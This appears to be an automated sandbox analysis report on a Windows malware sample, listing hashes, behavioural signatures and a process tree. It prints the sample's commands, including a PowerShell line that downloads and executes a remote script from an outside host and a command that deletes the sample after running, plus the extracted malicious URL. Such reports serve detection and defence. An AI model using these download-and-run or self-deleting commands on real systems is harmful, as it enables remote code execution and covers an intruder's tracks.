Analysis
-
max time kernel
143s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
17-09-2023 02:43
Static task
static1
Behavioral task
behavioral1
Sample
c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf.exe
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf.exe
Resource
win10v2004-20230915-en
General
-
Target
c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf.exe
-
Size
247KB
-
MD5
f17afa21e88b7a362db5ae8fdfa43de9
-
SHA1
14b024dfe1f9aa6eb88bc7e2215e4877c92cc01e
-
SHA256
c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf
-
SHA512
efbdcd1c0fb91cb15de2935ed500fb0f9a8b3ef1491e9823850e97451348cd3a170bc0ad3c84086438508f7280f100a33ff8299a7de64093129b2d7ea83b8e0d
-
SSDEEP
3072:98iTSP3d1hp5xnAs03vx54qylRs8crPGjl5mS3qI79TPJvLCw8DSmfNKgAiNNrc4:90zl37r79h2DSm1SgAOmhzN+
Malware Config
Extracted
https://aszfiltration.com/storage/files/debug2.ps1
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 25 856 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Control Panel\International\Geo\Nation c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 856 powershell.exe 856 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 856 powershell.exe -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf.execmd.execmd.exedescription pid process target process PID 776 wrote to memory of 1676 776 c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf.exe cmd.exe PID 776 wrote to memory of 1676 776 c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf.exe cmd.exe PID 1676 wrote to memory of 856 1676 cmd.exe powershell.exe PID 1676 wrote to memory of 856 1676 cmd.exe powershell.exe PID 776 wrote to memory of 3012 776 c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf.exe cmd.exe PID 776 wrote to memory of 3012 776 c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf.exe cmd.exe PID 776 wrote to memory of 3012 776 c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf.exe cmd.exe PID 3012 wrote to memory of 4124 3012 cmd.exe PING.EXE PID 3012 wrote to memory of 4124 3012 cmd.exe PING.EXE PID 3012 wrote to memory of 4124 3012 cmd.exe PING.EXE
Processes
-
C:\Users\Admin\AppData\Local\Temp\c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf.exe"C:\Users\Admin\AppData\Local\Temp\c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:776 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://aszfiltration.com/storage/files/debug2.ps1')"2⤵
- Suspicious use of WriteProcessMemory
PID:1676 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command IEX(New-Object Net.Webclient).DownloadString('https://aszfiltration.com/storage/files/debug2.ps1')3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:856
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf.exe" >> NUL2⤵
- Suspicious use of WriteProcessMemory
PID:3012 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.13⤵
- Runs ping.exe
PID:4124
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82